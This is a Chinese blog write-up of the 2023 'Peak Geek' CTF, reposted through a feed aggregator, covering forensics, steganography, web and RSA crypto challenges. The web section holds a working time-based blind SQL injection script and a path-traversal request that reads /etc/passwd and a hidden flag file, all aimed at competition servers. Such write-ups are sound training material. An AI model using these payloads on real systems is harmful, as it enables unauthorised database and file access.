惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

P
Proofpoint News Feed
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Microsoft Security Blog
Microsoft Security Blog
云风的 BLOG
云风的 BLOG
MongoDB | Blog
MongoDB | Blog
Know Your Adversary
Know Your Adversary
K
Kaspersky official blog
人人都是产品经理
人人都是产品经理
IT之家
IT之家
Recorded Future
Recorded Future
Recent Announcements
Recent Announcements
D
DataBreaches.Net
C
CXSECURITY Database RSS Feed - CXSecurity.com
U
Unit 42
博客园 - 【当耐特】
I
Intezer
Cisco Talos Blog
Cisco Talos Blog
Spread Privacy
Spread Privacy
L
LINUX DO - 热门话题
H
Help Net Security
L
LangChain Blog
T
The Exploit Database - CXSecurity.com
P
Palo Alto Networks Blog
Scott Helme
Scott Helme
The GitHub Blog
The GitHub Blog
博客园_首页
P
Proofpoint News Feed
大猫的无限游戏
大猫的无限游戏
S
Secure Thoughts
The Register - Security
The Register - Security
Engineering at Meta
Engineering at Meta
T
Threatpost
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Blog — PlanetScale
Blog — PlanetScale
C
Cybersecurity and Infrastructure Security Agency CISA
T
Troy Hunt's Blog
罗磊的独立博客
腾讯CDC
Simon Willison's Weblog
Simon Willison's Weblog
Security Latest
Security Latest
Last Week in AI
Last Week in AI
P
Privacy & Cybersecurity Law Blog
Latest news
Latest news
The Cloudflare Blog
Jina AI
Jina AI
小众软件
小众软件
Cloudbric
Cloudbric
TaoSecurity Blog
TaoSecurity Blog
F
Full Disclosure
V
V2EX

Hi, I Am I

[I Am I 年度简报] — 不知终日梦为鱼 初探 ESP32-CAM QQ 聊天记录 MHT 文件转 HTML [I Am I 年度简报] - 草木本无意,荣枯自有时。 Hexo 中实现 Live Photos 支持 写在当下 NKCTF 2024 1z_F0r3ns1c5 Writeup 春秋杯冬季赛 2023 Writeup [I Am I 年度简报] - 2023 某内网渗透内部赛 Writeup 强网拟态 2023 Writeup Github Actions 自动化部署 Hexo 浅析CobaltStrike流量解密 陇剑杯 2023 Writeup CTF线下赛AWDP总结 ISCC 2023 Writeup ISCC 2023 实战题 Writeup CISCN 2023 Writeup 福建闽盾杯网络空间安全大赛 2023 Writeup 天一永安杯宁波市网络安全大赛 2023 Writeup 贵阳大数据及网络安全精英对抗赛 2023 Writeup 红明谷杯 2023 Writeup Confetti 带来有仪式感的鼓励 记一次 JS 逆向密码加密 [I Am I 年度简报] – 2022 PHP 读取 Excel 文件内容并写入数据库 从0开始的 MoeCTF 开发之路 观安杯 2022 Writeup 利用微信服务号实现早安自动化 Cloudflare批量拉黑IP脚本 蓝帽杯 2022 Writeup 为你的网站添加 Do you like me 小组件 ISCC 2022 Writeup CISCN 2022 Writeup ISCC 2022 实战题 Writeup CTF线下赛AWD攻防总结 [I Am I 年度简报] – 2021 记一次 CNVD 通用型漏洞证书挖掘 Google Adsense 收款流程 使用 Digispark 开发板制作 BadUSB 在 Vue 中使用 Axios 获取钉钉群直播回放的 M3U8 地址 Flask 框架学习记录 关于 Ten·API 防火墙的配置 关于最近 关于 Burp Suite 调教这档事 ISCC 2021 Writeup 记一次 CTF 环境和动态独立靶机部署 各大平台图集解析思路 情话总雷同,恨意千万种 HackThisSite Basic Writeup [I Am I 年度简报] - 2020 Kali 设置中文语言和更换镜像源 使用 Python 下载哔哩哔哩视频 PHP使用 CURL 发送网络请求 PHP蓝奏云直链解析源码 从0开始写一个短视频去水印接口 Windows+Ubuntu 双系统之美化 GRUB Windows+Ubuntu 双系统安装 树莓派安装 Aria2 实现24小时不间断的下载机 抖音无水印解析最新PHP源码 API-Admin Ten·API管理后台 树莓派安装 DLNA 实现流媒体服务器 [I Am I 年度简报] - 2019 Hello Hexo Goindex 将 Google Drive 打造成网盘 自用博客评论邮件通知美化模板 使用 IFTTT 长久保留 Google Voice 号码 Telegram MTProxy 代理一键安装脚本 三分钟学会搭建我的世界基岩版服务器 PHP跳转QQ聊天窗口源码 推荐几款开源HTML5(Web)框架 谷歌新出浏览器 Chromium 可以直接翻墙 Live2D!为你的网站添加看板娘 为你的网站添加Gittalk评论 网站数据离奇丢失...... Lsky Pro(兰空图床)—又一款单纯的图床程序 LOL明天解封ヾ(◍°∇°◍)ノ゙ 唔~本站受到DDOS攻击 [I Am I 年度简报] – 2018 死肥宅也要谈恋爱之早安晚安自动化 1024,Hello,world! 宝塔面板 Bt.cn 专业版破解教程 Uptime >>16 years 震惊!坐在家里竟然可以日入百万 免费获取一年的 .ooo 域名 PHP 调用 新浪API 生成短网址 思杰马克丁成 Adobe 中国授权经销商 畅言商业广告上线-去除畅言评论广告 使用网易云音乐官方接口解析VIP音乐 PHP获取QQ昵称和头像API 坦白说查发送人QQ新方法(已失效) 日常水一波 通过微博图片地址溯源上传者 WordPress 评论夜间自动改为必须审核 十步叫你如何无损修复硬盘锁(mbr病毒) [I Am I 年度简报] – 2017 密码破解与心理学 网页屏蔽各种按键的代码分享 网络安全技术专业术语
巅峰极客 2023 Writeup
2023-07-22 · via Hi, I Am I

Misc

welcome

极客荟萃,逐梦巅峰!欢迎大家参加中国电信·2023“巅峰极客”网络安全技能挑战赛。 本场比赛空调已开放.jpg,请各位选手提交flag凭证有序进入。 flag凭证如下: ZmxhZ3tQZWVrZ2Vla18xc19BX0dyM2E3X2VWZW43X2Ywcl9ldjNyeV9DVEZlcn0=

直接 Base64 解码

flag{Peekgeek_1s_A_Gr3a7_eVen7_f0r_ev3ry_CTFer}

foundme

I made an image that I really liked with my favorite flag, but the computer accidentally shut down, but fortunately I saved the dump file.

直接 010 打开检索 flag 得到一段提示

It's just a dump file, and you've found a new lead Maybe you know the Netflix picture format? Hope this hint helps you. Search for more information to find the flag!

同时发现一个文件 FFFFFFLAG.AVIF

image-20230721174012663

直接百度找了一个图片在线转 AVIF 的网站,然后查看文件头为一下内容(第四位不固定,所以我们直接搜后四位)

00 00 00 xx 66 74 79 70

image-20230721174439483

找到了文件头但是找不到文件尾,直接不管那么多,随缘复制然后导出为 avif 即可,照片查看器有容错机制

image-20230721174540922

song

网易云,上号!

直接 010 搜索附件找到 flag.txt文件,但是 binwalk 分离不出压缩包

image-20230721174807634

后来直接开头前五位改写为 50 4b 03 04 14 同时后缀改为 zip 正常打开了,解压后全局搜索 flag 发现 docProps\app.xml 里面提示 Flag in Netease cloud

image-20230721205223638

同时在 docProps\thumbnail.jpe 分离出一个压缩包

image-20230721205717439

Please do not try to burst the password!!!!!!!!

同时在 password_hint.txt 得到一串编码

9iZ!r@n(9KAQV])<,6_K:,$L-<`N0U>'`J\@;A:f@X:pc;__<N;f->);/8c[<(K>S=u&Q<<C\oJA2-DK9l+cpAQMnd;/LD5=&s-8@T?rP;cdd':,$@!;_g1U<ARX#;)<$*;/J0E@P^bo;f-JGAQ3=t:/tFO@r$$s9gs:q@kgl'<`Lh:

直接 CyberChef 梭掉,另外最后需要选择一下编码为 UFT-8 否则乱码

image-20230721210329379

然后在 ppt/media 目录发现一个大小异常的图片 image4.png

image-20230721205039320

其中 image4.pngimage5.png 图片除文件大小为,其他一模一样(内容和宽高),通过 010 观察两个文件发现 image4.png 是在 image5.png 的基础上插入了大量的内容,通过比对文件尾发现插入其他内容的 hex 如下所示

C7FF038FBFE300A4F7141C<插入的内容>0000000049454E44AE426082

直接编写代码取出插入的部分,然后转换为文件

import binascii

with open('image4.png', 'rb') as f:
    hex_data = binascii.hexlify(f.read()).decode().upper()

start_idx = hex_data.find('C7FF038FBFE300A4F7141C')
end_idx = hex_data.find('0000000049454E44AE426082')

data = binascii.unhexlify(hex_data[start_idx + 22:end_idx])

with open('output', 'wb') as f:
    f.write(data)

直接通过 file 命令分析一波

┌──(kali㉿kali)-[~/Desktop]
└─$ file output
output: Monkey's Audio compressed format version 3990 with high compression, stereo, sample rate 44100

百度检索 Monkey's Audio 发现文件后缀格式应该为 .ape 且是一个音频文件,我们直接后缀改为 .ape

Monkey's Audio是一种无损压缩技术的软件,常被用来解压缩APE格式的无损音乐文件,APE是流行的数字音乐文件格式之一。

直接使用 Deepsound 进行解密(这隐写软件只在 VishwaCTF 2023 里面用过,幸好隔得时间不长没忘记),直接导入文件,提示输入密码

结合 password_hint.txt 得到的信息直接弱密码 123456 解密成功

image-20230722140919082

得到的 password.txt 文件内容为 Ook 编码,直接解码后得到密码

this_zip_password_is_QazWsx147!@#

最终解压我们最初分离出的文件得到 flag

flag{lW9tUyrh8RzzvysrswAwY7MHR4mmbLSt}

Web

hellosql

笛卡尔积,导致时间盲注

import requests
import time

url = "http://web-2f7d23ba90.challenge.xctf.org.cn/index.php?id="
flag = ""

def str2hex(str):
    hex1='0x'
    for i in str:
        hex1+=hex(ord(i))[2:]
    return hex1
result=''
for i in range(1,100) :
    time.sleep(0.1)
    low = 32
    high = 127
    mid = (low + high) // 2

    while (low < high):

        payload = "' OR CASE WHEN ASCII(SUBSTR((SELECT(group_concat(Flagg))from(ctf.Flllag)),{},1))>{} THEN (SELECT MAX(A.TABLE_NAME) FROM information_schema.columns A, information_schema.columns B) END#".format(i, mid)

        start_time = time.time()
        r = requests.get(url=url,params={
            "id":payload
        },)
        end_time = time.time()
        print(end_time-start_time)
        if (end_time - start_time) >= 0.5:
            low = mid + 1

        else:
            high = mid
        mid = (low + high) // 2

    if mid == 32 or mid == 127:
        break
    print(i)
    flag += chr(mid)
    print(flag)

hinder

路由为/hinder

我们尝试双写 // 得到一个 hint

image-20230721175342902

经过测试发现存在任意文件下载,但是经过 FUZZ 以及读取环境变量等操作,并未发现 flag

//hinder/download.action?filename=../../../../../../../../../../../../etc/passwd

最终通过读取未删除的 /run.sh 文件得到 flag 存在于 oh_u_f1nd_me 文件中

#!/bin/sh

#echo $FLAG > /oh_u_f1nd_me
FLAG=not_here
export FLAG=not_here
/usr/local/tomcat/bin/catalina.sh run

//hinder/download.action?filename=../../../../../../../../../../../../oh_u_f1nd_me

Crypto

数学但高中

来感受一下画图的乐趣,没有字母’o’

desmos 中输入附件给出的函数即可

flag{Funct10n_Fun}

image-20230722142542057

Simple_encryption

一起学数学

第一段:原题 [V&N2020 公开赛]Fast

第二段:一元copper

import gmpy2
import binascii
from sympy import Symbol, solve
from Crypto.Util.number import long_to_bytes

c1= 19024563955839349902897822692180949371550067644378624199902067434708278125346234824900117853598997270022872667319428613147809325929092749312310446754419305096891122211944442338664613779595641268298482084259741784281927857614814220279055840825157115551456554287395502655358453270843601870807174309121367449335110327991187235786798374254470758957844690258594070043388827157981964323699747450405814713722613265012947852856714100237325256114904705539465145676960232769502207049858752573601516773952294218843901330100257234517481221811887136295727396712894842769582824157206825592614684804626241036297918244781918275524254
c2= 11387447548457075057390997630590504043679006922775566653728699416828036980076318372839900947303061300878930517069527835771992393657157069014534366482903388936689298175411163666849237525549902527846826224853407226289495201341719277080550962118551001246017511651688883675152554449310329664415179464488725227120033786305900106544217117526923607211746947511746335071162308591288281572603417532523345271340113176743703809868369623401559713179927002634217140206608963086656140258643119596968929437114459557916757824682496866029297120246221557017875892921591955181714167913310050483382235498906247018171409256534124073270350
N= 21831630625212912450058787218272832615084640356500740162478776482071876178684642739065105728423872548532056206845637492058465613779973193354996353323494373418215019445325632104575415991984764454753263189235376127871742444636236132111097548997063091478794422370043984009615893441148901566420508196170556189546911391716595983110030778046242014896752388438535131806524968952947016059907135882390507706966746973544598457963945671064540465259211834751973065197550500334726779434679470160463944292619173904064826217284899341554269864669620477774678605962276256707036721407638013951236957603286867871199275024050690034901963
g1= 20303501619435729000675510820217420636246553663472832286487504757515586157679361170332171306491820918722752848685645096611030558245362578422584797889428493611704976472409942840368080016946977234874471779189922713887914075985648876516896823599078349725871578446532134614410886658001724864915073768678394238725788245439086601955497248593286832679485832319756671985505398841701463782272300202981842733576006152153012355980197830911700112001441621619417349747262257225469106511527467526286661082010163334100555372381681421874165851063816598907314117035131618062582953512203870615406642787786668571083042463072230605649134
g2=14068322834597276347776814624877614869834816383564391664570268934537693322688875343215293618493363798985047779057952636529313879548457643220996398640913517182122425631198219387988691569709691279442005545716133131472147592456812502863851227108284027033557263611949365667779259585770738623603814004666845554284808166195201470503432803440754207350347128045893594280079379926676477680556845095378093693409219131090910168117334308781843178748431526974047817218228075136005979538773141427004682344298827618677773735288946271346252828348742296301538573408254015281232250841148556304927266143397565889649305095857756884049430

def decrypt(c1, c2):
    xp = c1 % p
    xq = c2 % q
    m = (xp*gmpy2.invert(q, p)*q + xq*gmpy2.invert(p, q)*p) % N
    return m

p = gmpy2.gcd(g1-1,N)
q = gmpy2.gcd(g2-1,N)
m = decrypt(c1,c2)
flag1 = binascii.unhexlify(hex(m)[2:]).decode('utf-8')

S= 234626762558445335519229319778735528295
N= 28053749721930780797243137464055357921262616541619976645795810707701031602793034889886420385567169222962145128498131170577184276590698976531070900776293344109534005057067680663813430093397821366071365221453788763262381958185404224319153945950416725302184077952893435265051402645871699132910860011753502307815457636525137171681463817731190311682277171396235160056504317959832747279317829283601814707551094074778796108136141845755357784361312469124392408642823375413433759572121658646203123677327551421440655322226192031542368496829102050186550793124020718643243789525477209493783347317576783265671566724068427349961101
e= 5
Cs= [1693447496400753735762426750097282582203894511485112615865753001679557182840033040705025720548835476996498244081423052953952745813186793687790496086492136043098444304128963237489862776988389256298142843070384268907160020751319313970887199939345096232529143204442168808703063568295924663998456534264361495136412078324133263733409362366768460625508816378362979251599475109499727808021609000751360638976, 2240772849203381534975484679127982642973364801722576637731411892969654368457130801503103210570803728830063876118483596474389109772469014349453490395147031665061733965097301661933389406031214242680246638201663845183194937353509302694926811282026475913703306789097162693368337210584494881249909346643289510493724709324540062077619696056842225526183938442535866325407085768724148771697260859350213678910949, 5082341111246153817896279104775187112534431783418388292800705085458704665057344175657566751627976149342406406594179073777431676597641200321859622633948317181914562670909686170531929552301852027606377778515019377168677204310642500744387041601260593120417053741977533047412729373182842984761689443959266049421034949822673159561609487404082536872314636928727833394518122974630386280495027169465342976]

flag2 = ''
for i in range(2):
    m1 = gmpy2.iroot(Cs[i], e)[0]
    s = Symbol('s')
    eq = (i + 128) ** 2 * s ** 2 + (i + 1024) * s + (i + 512) - m1
    result = list(solve(eq, s))
    flag2 += long_to_bytes(result[1]).decode('utf-8')

print(flag1 + flag2)
# flag{f561fafb-32ce-9d16-18fa-ec795fc1d208}